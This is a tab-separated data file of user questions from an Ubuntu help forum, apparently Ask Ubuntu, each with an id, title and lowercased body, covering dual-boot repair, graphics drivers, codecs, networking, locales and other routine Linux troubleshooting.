214399	ubuntu 11.10 running in windows 7 ( wubi ) and on a separate partition	i am in a very strange situation and need some help : i installed ubuntu 11.10 through wubi a while back so that i can use it alongside windows 7 . i was running out of space on my disk when trying to install applications . without understanding how wubi worked , i partitioned my c drive ( creating a new 90 gb partition ) in windows , booted from the ubuntu 11.10 install/live disk , and used the `` something else '' option to create a ext4 ( setting the mount point to root ) and swap space partitions ( /sda5 and /sda6 ) . after the install , my computer no longer boots with the previous wubi menu and is now using the linux grub . the options i have are /sda2 , which boots windows 7 ; /sda1 , which does n't do anything and reloads the same menu , and the run linux options . so i now have ubuntu running on a separate partition , as well as the original wubi install . i want to delete the seperate partition and go back to running ubuntu on wubi ... if i remove the partition will i need the windows 7 disk to restore the boot loader ? i dont have the windows 7 disk on me so what is the best way to clean this up so i get rid of the seperate partition ? -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -update -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ============================================================================================================ thank you so much for your response . actually , it would be fantastic if i could migrate my wubi install into the new partition because i had downloaded the aosp on the wubi install ( as well as other files ) and would love to preserve them . if i can do that and work on the new partition with the old files than that would be great , and i can worry about wiping out the partition completely later on i.e . when i have the windows disk or something . can you tell me how to do this migration ? ? so when i select the /sda2 , it loads up my windows . if i click on the linux , it loads up the newly install linux ( my files that were on the wubi install are n't there ) fine . if i click on the /sda1 ( system_drive ... this is what the wubi was using to boot the menu that let me select windows 7 or ubuntu ) ... it fails and just reloads the original menu . here is the link to my boot info script http : //pastebin.com/dmry0nl3 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- edit 2 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - i really appreciate the help bcbc . so i used the repair disk to run the `` bootrec /fixboot '' , which now brings me to the wubi windows boot menu ... it asks to select windows 7 or ubuntu just like it originally did . if i select windows 7 , it boots windows without any problems . however , if i choose ubuntu , it starts to boot ubuntu by displaying the ubuntu logo with the progress bar , then displays the purple screen . after this , it goes to dark screen and just sits there until i have to power off . the first time i tried it , it gave me a black screen with some few lines of output : : *checking battery state ... [ ok ] grub_editenv : error : can not write to file /boot/grub/grubenv.new *stopping system v runlevel compability [ ok ] *starting cups printing spooler/server [ ok ] it hung here for a while.. then printed [ 3672.070711 } iwlagn 0000:03:00.0 : aggregation not enabled for tid 0 because load 0 . is this problem/error you mentioned i might have in my wubi boot ? ? can you help me fix it : ) ? ?
214402	rhythembox music player and media player not working in usb start up	required plugin could not be found python ( v2.7 ) requires to install plugins to play media files of the following type : mpeg-1 layer 3 ( mp3 ) decoder python ( v2.7 ) requires to install plugins to play media files of the following type : advanced streaming format ( asf ) demuxer python ( v2.7 ) requires to install plugins to play files of the following types : â˘ mpeg-4 aac decoder â˘ h.263 decoder
214413	how to install windows os along side of ubuntu 12.04 ?	ok guys i need some help here , i want to install windows along with ubuntu 12.04 with ubuntu being my primary boot . i 've partitioned my hard disk to a ntfs format for windows , when i rebooted my computer i tried to install windows and everything was going good until a blue screen appeared .
214415	problem with nvidia drivers installation	i want to install new nvidia drivers r310 so i downloaded driver and when i run it it says that i ca n't install new drivers because there is this nouveau driver . it asked me if i want to add blacklist file with nouveau in modprobe so i said yes please . after reboot same thing , i searched through endless topics/questions/etc , i ran sudo apt-get remove -- purge xserver-xorg-video-nouveau and tried other things and still did n't find solution how to install new drivers .
214418	overlay text editor ?	i find myself often taking quick notes . e.g . jotting down what files i have edited etc , or a quick reminder . for this i just have a gedit window open to which i alt + tab , and then apply `` always on top '' to when i wish to take notes , and reverse to process when i am done . but i am looking for something much more convenient , what i am hoping exists is a guake-like text editor , that i can just hit a key and it drops down from the top of the screen , hit the key again and it pops back up . does said item exist anywhere ?
214421	how to install the mpeg-4 aac decoder and the h.264 decoder ?	where do i get the mpeg-4 aac decoder , and the h.264 decoder . how to install them and play the multimedia ?
214422	is there a way to install windows 8 as a dual-boot starting with ubuntu ?	is a way to dual-boot with ubuntu and windows 8 with going from ubuntu ? i 'm kind of stumped , i tried to do it earlier and it overwrote the grub so , i had to go in a live disc and fix the grub from there and i finally got it working again .
214424	will the touchscreen on this laptop work on ubuntu	i am looking at getting the acer aspire v5-571p-6473 laptop which has a very nice touchscreen . the thing i 'm worried about is the touchscreen not working under ubuntu . can anyone help me ?
214426	running halo : combat evolved on 12.10 ?	i followed the instructions on winehq and got the game installed , but when i run it , it looks like this and the whole screen occasionally flickers . does anyone know why , and if i can fix it ?
214431	ubuntu 12.04 on amazon ec2 : /dev/xvda1 will be checked for errors at next reboot ?	i 'm running the lastest ubuntu 12.04 ami ( ami-a29943cb ) from canonical on amazon ec2 and quite often when i log in i get the message : *** /dev/xvda1 will be checked for errors at next reboot *** i have read a bunch of documentation on this and seem to understand that every so many reboots ( around 37 see mount count / maximum mount count below ) ubuntu wants to check a disk for errors . i can see that by using dumpe2fs -h /dev/xvda1 ( reference ) to get information such as : last mounted on : / filesystem uuid : 1ad27d06-4ecf-493d-bb19-4710c3caf924 filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal ext_attr resize_inode dir_index filetype needs_recovery extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash default mount options : ( none ) filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 524288 block count : 2097152 reserved block count : 104857 free blocks : 1778055 free inodes : 482659 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 511 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 flex block group size : 16 filesystem created : tue apr 24 03:07:48 2012 last mount time : thu nov 8 03:17:58 2012 last write time : tue apr 24 03:08:52 2012 mount count : 3 maximum mount count : 37 last checked : tue apr 24 03:07:48 2012 check interval : 15552000 ( 6 months ) next check after : sun oct 21 03:07:48 2012 lifetime writes : 2454 mb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 default directory hash : half_md4 directory hash seed : 0a25e04c-6169-4d68-bfa6-a1acd8e39632 journal backup : inode blocks journal features : journal_incompat_revoke journal size : 128m journal length : 32768 journal sequence : 0x0000158b journal start : 1 i 've tried these things to get rid of the message and usually the badblocks is what does it for me : run this command and reboot : sudo touch /forcefsck run badblocks to check the disk : badblocks /dev/sda1 edit /etc/fstab and change the last `` 0 '' which is the fs_passno column accordingly and then reboot : the root filesystem should be specified with a fs_passno of 1 , and other filesystems should have a fs_passno of 2 . i do n't understand : if this is a virtual drive should n't it be less prone to errors ? was the image created with one of the flags set ? if not what is triggering it ? why is fs_passno set to 0 on amazon ec2 ubuntu images ? this is not the first one that is like this .
214435	install packages in cache automatically	i have restored all my packages to cache using aptoncd . now i want to reinstall the packages without having to choose each package . is there any way ?
214439	linux kernel 3.5.0-18 update is not working with nvidia driver 304.60	i have ubuntu 12.10 64 bit and a nvidia card gt430 and installed 304.60 linux driver manually and it worked beautifully until the latest ubuntu update which got modified to 3.5.0-18 kernel . everything has gone : launcher , windows i ca n't move them it got useless . i tried to run the previous kermel 3.5.0-17 with which the driver was working well . i gto the same desktop . useless - so the problem is something else i guess but it has to do with the update that 's for sure- any idea what to do ? now i have to switch back to windows 7 which i do n't want in order to able to work until an update will come up .
214441	windows maximize in the wrong display	i use dual display with ubuntu 12.04 . display 1 : thinkpad t420s . intel hd3000 display 2 : hp 1955 . whenever i want to maximize the windows ( say a chrome browser ) in display 1 , it automatically goes to display 2 . i tried several ways to maximize a windows ( shortcut , maximize button , mouse drag-to-top ) and it 's resulting the same . any idea how to resolve this ?
214442	how to burn an iso to a bootable sd card ? ( not ubuntu )	i have an iso image of windows 8 which i would like to burn to an sd card . how do i do this ? i know about the startup disk creator but it only works for an ubuntu image .
214444	help with macbook and 12.10	what is the latest version of ubuntu i can run with working wifi on my macbook 4,1 ( early 2008 ) ? i dual booted my mac osx lion alongside 12.10 but ca n't figure how to get the wireless to work . ergo , i downgraded to 10.10 for now . is 10.10 the latest version i can have on my macbook with working wifi , or is there another ? am i simply missing a terminal code to fix the drivers ?
214445	wifi and the gwibber icons disappeared from the indicator applet	they have disappeared from the indicator applet in the gnome-panel without asking me anything nor notifying . how can i bring them back in 11.04 ? i have rebooted and the situation persists . the functionalities are still there but there is no icon . only after connecting to a wifi the connection-icon ( those lines that represent waves ) appears , but there is never an icon showing that there is no wifi connection . weird ! edit.- i have found this logfile : /home/user/.cache/indicator-applet-complete.log its modification date is recent and , after some tests , i think that it is generated every time i generate events on the applet . looking at module : libapplication.so unable to load icon from file ' < a0 > < 97 > < 8f > ^a ' because : failed to open file '/usr/share/icons/ubuntu-mono-dark/statu s/22/indicator-messages.svg ' : no such file or directory using user icon for 'guest session ' from file : ( null ) connected to application indicator service . request current apps building new application entry : :1.31 with icon : nm-no-connection at position 0 notify visible signal recieved new calendar item indicator-sound : new_volume_slider_widget entry hint : post message ... get the username getting layout failed : operation was cancelled restarting service 'com.canonical.indicator.messages ' count 1 updating username label unable to load icon from file '^x < d2 > < d2 > < fc > < 9e > ^ ? ' because : failed to open file '/usr/share/icons/ubuntu-mono-dark /status/22/indicator-messages.svg ' : no such file or directory unable to load icon from file '` < 93 > < 92 > ^a ' because : failed to open file '/usr/share/icons/ubuntu-mono-dark/status/2 2/indicator-messages.svg ' : no such file or directory new_application_item ( `` chat '' ) unable to load icon from file ' < a0 > < bb > < 94 > ^a ' because : failed to open file '/usr/share/icons/ubuntu-mono-dark/statu s/22/nm-no-connection.svg ' : no such file or directory new_application_item ( `` ubuntu one '' ) just caught a style change event g_variant_get_string : assertion `value ! = null ' failed g_variant_get_string : assertion `value ! = null ' failed changing calendar property : calendar-marks changing calendar property : calendar-marks changing calendar property : calendar-marks building new application entry : :1.32 with icon : gnome-power-manager at position 0 unable to load icon from file '/usr/share/icons/ubuntu-mono-dark/status/22/indicator-messages.svg ' because : failed to open file '/usr/share/icons/ubuntu-mono-dark/status/22/indicator-messages.svg ' : no such file or directory signal : entry removed unable to load icon from file '/usr/share/icons/ubuntu-mono-dark/status/22/indicator-messages.svg ' because : failed to open file '/usr/share/icons/ubuntu-mono-dark/status/22/indicator-messages.svg ' : no such file or directory building new application entry : :1.32 with icon : gpm-battery-100 at position 0 unable to load icon from file '/usr/share/icons/ubuntu-mono-dark/status/22/indicator-messages.svg ' because : failed to open file '/usr/share/icons/ubuntu-mono-dark/status/22/indicator-messages.svg ' : no such file or directory signal : entry removed unable to load icon from file ' < b0 > w^p < f0 > < 9e > ^ ? ' because : failed to open file '/usr/share/icons/ubuntu-mono-dark/status/22/indicator-messages.svg ' : no such file or directory changing calendar property : calendar-marks changing calendar property : calendar-marks g_variant_get_string : assertion `value ! = null ' failed changing calendar property : calendar-marks changing calendar property : calendar-marks changing calendar property : calendar-marks changing calendar property : calendar-marks changing calendar property : calendar-marks g_variant_get_string : assertion `value ! = null ' failed changing calendar property : calendar-marks changing calendar property : calendar-marks changing calendar property : calendar-marks changing calendar property : calendar-marks but do n't know how can i use it to fix the problem . it mentions missing icon files and broken links because in that directory there is only .svg files , links to .svg files , broken links to .svg files , and , it seems , there are missing .svg files too . how to fix the problem and how can i know if there are more important problems in other places around ?
214446	how do you set up a ubuntu server so that it can recieve and run code remotely	i 've gotten my hands on two older ( i.e . ~2 years old ) department towers that i came across when setting up our new workstations that i want to turn into servers that people can run code on remotely . the code would mostly consist of python ( 2 and 3 ) and java . being able to run those is a must , but other languages would be nice . i thought here would be a good as place as any to ask where i would start .
214448	javascript enabled but not enabled in firefox browser	i had installed java ii icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~12.04.1 alternative jvm for openjdk , using cacao ii icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~12.04.1 alternative jvm for openjdk , using jamvm ii openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~12.04.1 openjdk java runtime , using hotspot jit ( headless ) ii openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~12.04.1 openjdk java runtime ( architecture and had installed addon in firefox browser quickjava 1.8.0 . and still keep getting message javascript enabled , but java is not enabled in firefox browser while trying to use on-line bill payment facility .
214452	libreoffice re-type password	i 've just upgraded to libreoffice 3.6.3 from 3.5.7 due to a bug , it fixed the bug but presented a new problem . when i save my ods spreadsheet with many password protected sheets ( 20 ) to an excel spreadsheet i 'm presented with a dialogue box to re-type passwords for every protected sheet . i have many of these spreadsheets is there an easier way to fix this problem or will i have to re-type passwords many times to fix this ? i am having this problem as well , lo version `` 3.5.6.2 '' . i have the original documents saved as `` .xls '' . so in theory , this should not be an issue at all . however , the end users love to make straight forward processes more complicated than is necessary , so here i am . i did some testing : i can save my file ( with protected sheet ) as a `` .ods '' file , then save it to `` .xls '' format without issue . if , however , i close lo after saving the file as ods , and then open lo and the ods file again , and attempt to save as xls , it fails with the error the op has described : `` hash incompatible '' . something is being lost when libre closes that is necessary for ods files to be saved with password protected sheets . edit : when prompted , if you elect to `` re-type '' , you actually get presented with several options . one option is to save without the password . however , the other option allows you to retype without verifying a match . i used this option , and after that , the status message changed from `` hash incompatible '' to `` hash compatible '' . i saved the document as `` .xls '' type , then closed calc . i then opened calc , and saved it as `` .ods '' . closed calc again . opened the `` .ods '' file , and attempted to save as `` .xls '' . would you like to overwrite ? yes i would ! and i got the password retype message again . so , however the hash was saved the first time i retyped the password ( overwriting the old hash ? ) , it was not saved correctly because the hash was incorrect upon the same process a second time .
214453	repeated internal errors in 12.04 - worth reporting every time ?	almost every time i start up my ubuntu 12.04 system i 'm told about an internal error relating to rhythmbox , which i have as a start-up application . i 've been opting to send an error report each time this happens , but i 'm not sure if this useful - should i keep on reporting these errors month in , month out , until they 're fixed , or is there a better way ?
214456	how can i install new locale to ubuntu ?	$ locale -a get output like this : c c.utf-8 en_ag en_ag.utf8 en_au.utf8 en_bw.utf8 en_ca.utf8 en_dk.utf8 en_gb.utf8 en_hk.utf8 en_ie.utf8 en_in en_in.utf8 en_ng en_ng.utf8 en_nz.utf8 en_ph.utf8 en_sg.utf8 en_us.utf8 en_za.utf8 en_zm en_zm.utf8 en_zw.utf8 posix zh_cn.utf8 zh_sg.utf8 how can i install a new locale , for example en_us.iso-8859-1 . after this operation , i wish en_us.iso-8859-1 could be listed in the locale -a list .
214458	any linux command to perform parallel decompression of tar.bz2 file ?	i have a rather large file ( ~50gb ) and it takes some time to run tar xvf file.tar.bz2 on it . i 'm aware of programs that can do parallel compression for bzip2 files but unaware of programs that can do parallel decompression for bzip2 files . are there any programs that can achieve this ? what is the exact syntax of the command to use to extract from the file ? i 'm using ubuntu 12.04
214460	changes to /etc/resolv.conf discarded when connecting to a new network	i have upgraded to 12.10 from 12.04 recently and i am having issues with connecting to the internet . i got an ip address and am able to ping other lan ips in the local network but i am unable to connect to the internet and am even unable to ping www.google.com from a terminal . somehow making changes in /etc/resolv.conf and restarting resolvconf service and rebooting works but i need to do this every time i connect to a new network . how do i make these changes permanent ? can someone suggest a solution to this issue ?
214466	how to enable num lock after login in 12.10 ?	i tried to set options in keyboard layout . i enabled `` default numeric keys '' but no success . i want it to be enabled only after login . i see the options in keyboard layout are slightly altered in 12.10 . how do i do it in 12.10 ?
214475	give different name to application shortcut than its name tag	is there a way to create an application shortcut that executes a script and appears in unity dock under a different name ? i ask this since i have a script that launches several related apps ( in this case qjackctl , followed by an audio app ) to make users ' experience more streamlined . however , when qjackctl is launched , it shows up in the unity dock as a new icon with a question mark and the same name as the name of the shortcut ( instead of appearing under the existing qjackctl shortcut ) . i think qjackctl is written in qt ( not sure if that makes any difference ) . so , is there a way to force unity to group it under the right icon while still keeping the shortcut name intact ( the name is necessary to describe what setup is being loaded as the same script can execute different apps by giving it different flags ) ? would this require changing code within qjackctl source that forces such change or is there another way ?
214478	where can i get the official chromium .deb package ?	before i had installed chromium 20 from wolf\crack ppa , but later i had uninstalled it when i know it is not an official ppa . i found it at the ubuntu package repository for download , i think its official version , but when i install it with the software center it still downloads the version 20 , should i trust it ? i had tried to install chromium from the chromium-browser_20.0.1132.47~r144678-0ubuntu0.12.04.1_i386.deb which i had downloaded in my computer , but the ubuntu software center download it again and by checking the 2 downloaded files md5 , i found them is not the same , is it fine ?
214481	ubuntu server 12.10 no gui headless boot and/or reboot	i have a headless server running the latest ubuntu server 12.10 . it does not have any gui at all . i am having the same issue that others are having which is that when you boot or reboot without a monitor ( headless ) the computer does not boot . the solution presented to others was to edit their xorg.conf file . but since i do not want a gui installed ( and therefore chose not to install a gui after installing ubuntu 12.10 ) i do not have a xorg.conf file in the /etc/x11/ directory . ubuntu is a widely used distro of linux , especially for server applications , i absolutely love it . therefore , there has to be someone who solved this already ?
214482	how to change browser search text font color ?	i am using ubuntu 11.10 . the google search bar font color of my firefox browser is almost white with a white background . this occured after i installed eye of gnome theme . how to change the font color ?
214485	remote desktop viewer set-up for 12.10	how do you set up the remote desktop in 12.10 ? i 've scanned the available answers here and did n't find anything that answers the question considering the 12.10 interface . specifically , advice says to check the `` allow others to control your desktop '' and an ip will pop up ( 10.04 i believe ) . but when checking this in quezal no ip shows . so how would i connect to my desktop from somewhere other than the local network , like say a coffee house ? i also see this remmina client program but have no idea if i need to use that as well . can someone give me a step-by-step or point me to one that i have n't found yet ? thanks .
214486	wubi ubuntu installation `` no root file system defined ''	i downloaded wubi.exe & ubuntu 12.04 lts from the official website then put them in a single folder in my internal hard disk . then i run wubi , and it got installed within 2 minutes . and then i rebooted my pc . then ubuntu loaded up and there were no icons anywhere just a black bar at the top and the ubuntu default background wallpaper . then a popup came up saying verifying files and then a box popped up saying `` no root file system defined , fix this in partitioning menu '' . i tried to close it but it pops up again . and im stuck here with absolutely no idea what to do . im good at windows but i have zero experience of linux ubuntu . i need help desperately ! edit : i tried `` sudo parted -l '' with lower case l. it asked me whether it was a gpt table . i said `` no '' then nothing happened . but my problem still is n't solved.i also tried `` sudo blkid '' and it told me that my hard disk partitions are of `` ntfs '' type ( which i already know ) . please help me.i tried `` sudo apt-get remove dmraid '' but it returned with a error code 1 and my problem wasn '' t solved.installation & un-installation processes take less than a minute , is n't it fishy ?
214489	option like tail to keep track of whole file	tail -f will update the file once new data is inserted , but if the whole file is being rewritten it will give an error . is there any other option to keep reloading the whole file ? thank you
214494	directly compress stdout	can someone tell me if is possible to directly compress stdout ? i would like to do this in one step without creating temporary file files.txt ... example : cat file* > files.txt tar -czf files.tar files.txt rm files.txt is this possible ?
214496	how to delete older files using a bash script ?	how to find and delete older files ( older than 7 days ) in a folder using a bash script ? it 's a folder in a server which contain automatic backups . need to delete old ones automatically so there 's space for new ones .
214502	laptop quite dead after update on 12.10 and calibre	i have searched as thoroughly as i can so as not to waste anybody 's time but i ca n't find any help . i have a toshiba satellite 300 with vista home basic and running ubuntu - dual boot . everything was running well . this morning i updated the 12.10 and then saw calibre running and downloaded the latest version . in a terminal window loaded the commands as suggested by calibre for linux and then opened the filw manager and double clicked on the claibre shell file to run it . seemed ok. then clicked on calibre on the left hand bar and everything went black and dead . i tried to start by pushing the start button - no light , no sound , nothing . i removed the ram and reinserted it , after removing power and battery for a while - nothing . it might as well be a paperweight .
214504	splash screen flickers during every boot	splash screen flickers heavily during boot on my dell inspiron n5010 laptop , but disappears after some time by press esc button ( several times ) ..this happens everytime i boot ... the problem exists in all linux-distros currently on ubuntu 12.10 64 bit ... my laptop doesnt hav any dedicated graphics card but oly intel hd 3000 i hav enclosed boot.log , dmesg.log , xorg.log and my system info respectively boot.log xorg.log
214508	updates are not working	updates in my system are not getting installed.. sudo apt-get install is giving the following error : - w : gpg error : http : //archive.cloudera.com precise-cdh4 release : the following signatures could n't be verified because the public key is not available : no_pubkey 327574ee02a818dd update manager is showing different error as shown in screenshot
214511	lost all email and accounts in thunderbird	open up thunderbird at system startup and found the wizard to create email ? there are not any of the accounts i had , no mail whatsoever this happens to me very frequently , and thus i consider it one of the `` ubuntu morning tax '' - a way of qualifing all the problems that ubuntu gives you
214514	what can you currently do with ubuntu on nexus 7 ?	i am about to buy a nexus 7 16gb and am wondering if i 'll be able to watch videos on it . i know it 's a experimental release , but if it can play my movies i 'll already be satisfied : ) first thing i 'll be doing is removing android for the wonderful ubuntu : d
214516	how to automatically sort files out ?	i have many files in my external harddrive , so i want to automatically tell the computer to sort all my files into folders , by their size , extension , name and other variables . is there any program that will allow me to perform these tasks . please teach me how to install it too .
214518	how to enable to work only one card on my laptop ?	i have a laptop with intel hd and nvidia gpu video cards and i have a problem with installing drivers for the second . they mess everything up . unity do n't want to start , because glx missing on display 0:0 and resolution of screen is 640x480 , though , i ca n't change it in terminal . xrandr -s 1920x1080 says this kind of mode does n't exist . i looked up this problem and it 's due to nvidia drivers ( i tried to install 310.14 , but it does n't work with other versions neither ) , so i want ubuntu to see only my nvidia card and forget about intel one . how do i do it ?
214520	how can i globally disable firefox 's webapp prompts ?	i do n't use unity so unity-webapps ( as they stand ) have less than no value to me . being prompted on various sites is actually getting annoying . so is there a way to just disable it ?
214526	wordpress permissions ubuntu	while trying to upload a header image to wordpress theme twenty eleven i get this error : unable to create directory /srv/www/wp-uploads/i3e.ndu.edu.lb/2012/11 . is its parent directory writable by the server ? even though the server is up and running and the website is accessible . i 've messed it up more than once so i need the exact steps .
214527	rake aborted ! undefined local variable or method	in a fresh new ubuntu machine , i have installed ruby with sudo apt-get install ruby1.8 and then installed rubygem1.8 with : sudo apt-get install rubygems and after that installed rails3.2.8 with : gem install rails the procedure was very simple . but here comes the problem . when i tried checking the version of rake with rake -- trace -version i got the following error : rake aborted ! undefined local variable or method `rsion ' for # < rake : :application:0xb72c731c > /var/lib/gems/1.8/gems/rake-0.9.2.2/lib/rake/application.rb:316 : in `standard_rake_options' /usr/lib/ruby/1.8/optparse.rb:1298 : in `eval' /var/lib/gems/1.8/gems/rake-0.9.2.2/lib/rake/application.rb:316 : in `standard_rake_options' /usr/lib/ruby/1.8/optparse.rb:1298 : in `call' /usr/lib/ruby/1.8/optparse.rb:1298 : in `parse_in_order' /usr/lib/ruby/1.8/optparse.rb:1254 : in `catch' /usr/lib/ruby/1.8/optparse.rb:1254 : in `parse_in_order' /usr/lib/ruby/1.8/optparse.rb:1248 : in `order ! ' /usr/lib/ruby/1.8/optparse.rb:1339 : in `permute ! ' /usr/lib/ruby/1.8/optparse.rb:1360 : in `parse ! ' /var/lib/gems/1.8/gems/rake-0.9.2.2/lib/rake/application.rb:425 : in `handle_options' /var/lib/gems/1.8/gems/rake-0.9.2.2/lib/rake/application.rb:74 : in `init' /var/lib/gems/1.8/gems/rake-0.9.2.2/lib/rake/application.rb:133 : in `standard_exception_handling' /var/lib/gems/1.8/gems/rake-0.9.2.2/lib/rake/application.rb:72 : in `init' /var/lib/gems/1.8/gems/rake-0.9.2.2/lib/rake/application.rb:64 : in `run' /var/lib/gems/1.8/gems/rake-0.9.2.2/lib/rake/application.rb:133 : in `standard_exception_handling' /var/lib/gems/1.8/gems/rake-0.9.2.2/lib/rake/application.rb:63 : in `run' /var/lib/gems/1.8/gems/rake-0.9.2.2/bin/rake:33 /usr/local/bin/rake:19 : in `load' /usr/local/bin/rake:19 is it the problem due to i have installed straight from ubuntu apt-get package manager ?
214528	radeon open source drivers configuration	how does one configure the radeon open source drivers ? i have just installed ubuntu 12.10 and want to try the open source drivers instead of the proprietary amd binaries . after the installation , the driver seems to be installed , i have wobbly windows working ( ca n't use a pc without wobbly windows ! ) , and life is generally good . i have a problem when i connect a secondary monitor . performance is killed ( everything becomes laggy and jerky ) and my laptop sits on the right-hand side of the monitor , not the left . i 'd like to know how to turn off the laptop 's monitor so i 'm just using the external monitor . how can i do this using the open source radeon drivers ? i ca n't find a gui management tool , and there 's no longer an xorg.conf . what to do ?
214529	unity launcher has disappeared !	yesterday , i freshly installed ubuntu 12.04 and it worked fine , but today when i booted the computer something strange happened . the unity launcher disappeared ! any help would be appreciated .
214531	os x keyboard mapping and shortcuts in ubuntu 12.10	i know there are similar questions : os x keyboard layout in unity or ubuntu mac os keyboard layout in ubuntu but they have no solution for that question . how to setup os x keyboard mapping and shortcuts in ubuntu 12.10 ? actually , it means to support at least application and other os x shortcuts table from os x keyboard shortcuts on non-mac keyboard .
214533	how to get rid of unity 2d 's task bar notifications ?	when an im or ( other program ) gets a new message , it flashes its window and i my unity left bar opens itself and grabs my attention . the animation takes around five seconds and bugs me . is there a way i can prevent the left bar to show itself and grab my attention ? he 're is how it looks
214534	how to install hardware drivers for my laptop	everytime i change the os i usually format my laptop . it is an hp tx-2 touchsmart . it has a touchscreen and additional hardware that is n't working ( i.e . volume control buttons and the network discovery ) if i was on windows i would just download the hardware drivers from the hp website . how do i go about installing the software for the built-in hardware of my laptop ? i am new to the community and i really want to get this computer working like it used to , to get the full ubuntu experience . please direct me , thank you .
214537	audio pc software running on ubuntu	i recently built my own home studio pc . i5 cpu ) 8gb ram , solid state drive etc . basically the fastest pc i 've ever built . i have a 32bit version of windows xp and all the music software i have runs on this . however , i want to use all the ram and can only do so by moving to 64bit windows . my questions are : will ubuntu run my audio software or would i need to get linux specific audio software ? are there any good ( pro ) shareware linux based multi-track audio software packages ? will vst plug-ins work through ubuntu ?
214538	printing in booklet format	in the past i had a printer that had the booklet format option that would print the document two pages at a time ordered in a way that folding the whole printout would produce a booklet , half the size of the paper which could be stapled in the middle . my current printer does not support this feature . i would like to use some utility or script to convert an a4 pdf to an a5 booklet one . i found this page but i 'm getting an error : pdfjam error : ca n't find pdflatex ! how do i get past this issue ? does anybody know of any other solution ? i 'm on ubuntu 12.10 amd64
214539	opening terminal asks for sudo password	whenever i open a new terminal within 12.04 , i am prompted to enter my sudo password . why is this happening ?
214542	is ubuntu commercially / generally avalible or tailered operating system ?	in my recent it course i am debating if ubuntu is a tailored operating system , version wise i would be looking at ubuntu 10.04 or ubuntu 9.04 as the specification for the unit course was written in 2010 . this is mainly to help me clear up what it is . thanks - ryan
214545	boot menu in aspire one 725	can you tell me how to enter boot menu on startup so i can install ubuntu 12.10 on aspire there is a grub menu and kernel installed but my skills are not good enough to do anything with it
214546	how to override system keyboard shortcuts ?	the standard ubuntu keyboard shortcuts make me crazy when i am developing in ide . when i click application specific shortcut i did n't get what i want because ubuntu has the same shortcut and action binding to the system shortcut came in action . so , is there a way to increase priority of application specific shortcuts ? i 'd want to freeze system shortcuts when working in ide .
214549	mplayer does not disable screensaver	so i have upgraded to ubuntu 12.10 and i installed smplayer from the repositories . the thing is when i play a movie ( even in full screen ) the screen saver comes up . i have to disable screensaver enabled in smplayer but it does n't seem to work apt-cache policy mplayer mplayer : installed : 2:1.0~rc4.dfsg1+svn34540-1ubuntu2 candidate : 2:1.0~rc4.dfsg1+svn34540-1ubuntu2 version table : *** 2:1.0~rc4.dfsg1+svn34540-1ubuntu2 0 500 http : //pt.archive.ubuntu.com/ubuntu/ quantal/universe amd64 packages 100 /var/lib/dpkg/status apt-cache policy gnome-screensaver gnome-screensaver : installed : 3.6.0-0ubuntu2 candidate : 3.6.0-0ubuntu2 version table : *** 3.6.0-0ubuntu2 0 500 http : //pt.archive.ubuntu.com/ubuntu/ quantal-updates/main amd64 packages 100 /var/lib/dpkg/status 3.6.0-0ubuntu1 0 500 http : //pt.archive.ubuntu.com/ubuntu/ quantal/main amd64 packages any ideas ?
214554	brightness stuck on maximum	i am using hp pavilion g6 laptop . it is dual-boot . i have installed windows 7 and ubuntu 12.04 lts edition . keyboard keys are working perfectly fine for increasing and decreasing brightness in windows 7 . but it is stuck on maximum brightness in ubuntu 12.04 . keyboard keys are not working in ubuntu . when i try to decrease brightness through keyboard , it stuck on some level and ca n't be decreased more than that . brightness is too high .
214555	very slow ssd speeds on 12.10	i recently upgraded my ultrabook to have a 128gb ssd ( crucial v4 ) . the speed of installing ubuntu was shockingly slow , worst i 've ever experienced . once installed i did some testing and the speeds show as being good and boot time is alright but when it comes to installing anything it is taking an absolute age . using apt-get is fine downloading , again when it comes to unpacking things go extremely slow ( took 10 minutes to install terminator ) . running firefox is becoming a burden as well . benchmark : $ sudo hdparm -tt /dev/sda /dev/sda : timing cached reads : 12428 mb in 2.00 seconds = 6218.55 mb/sec timing buffered disk reads : 718 mb in 3.01 seconds = 238.78 mb/sec ultrabook specs : intel i5-3317u 4gb ram 128gb crucial v4 ssd any help would be greatly appreciated . many thanks
214559	could it be possible to make a hot copy of a system ?	i 'd like to backup my system without turning it off . the system clone should also able to run in an other machine . i 've tried to `` dd '' the entire system partition on another disk , after that i 'm ensured that there 's no administrative tasks launched . i think i had to tell to the grub to boot on that disk , so i 've executed the command : grub-install /dev/sdc1 but i got this error : the file /boot/grub/stage1 not read correctly . i know that i am doing is not very clean , so have you a good solution to reach my goals or a idea to solve the grub problem ?
214560	how to move multiple files at once to a specific destination directory ?	i got a bunch of files in some directory ( along with many other files ) that i want to move . luckily , all the files i want to move contain a certain identifier in their names , so i can ls | grep identifier to get the exact list of files to move . but , how can i execute mv file /path/to/dest/folder/ at once , and not one by one ( there 's a lot of files to move ) ?
214562	can not transfer file due to `` filesystem does not support symbolic links '' error	when i want to transfer files from my local hard drive to my thumbdrive , i keep getting this error : filesystem does not support symbolic links . i do n't know what this is , i need help with transferring files . dragging and dropping , does not work for me , the error appears . right-click on the file and select copy , and then right click on the thumbdrive and select paste does not work , i am still getting the same error .
214564	regarding ufw firewall	i am using gproxy software in my computer ( ubuntu 12.10 ) . i want to allow incoming connection from only one ip adress , so that he can use internet . what settings should i configure in ufw firewall .
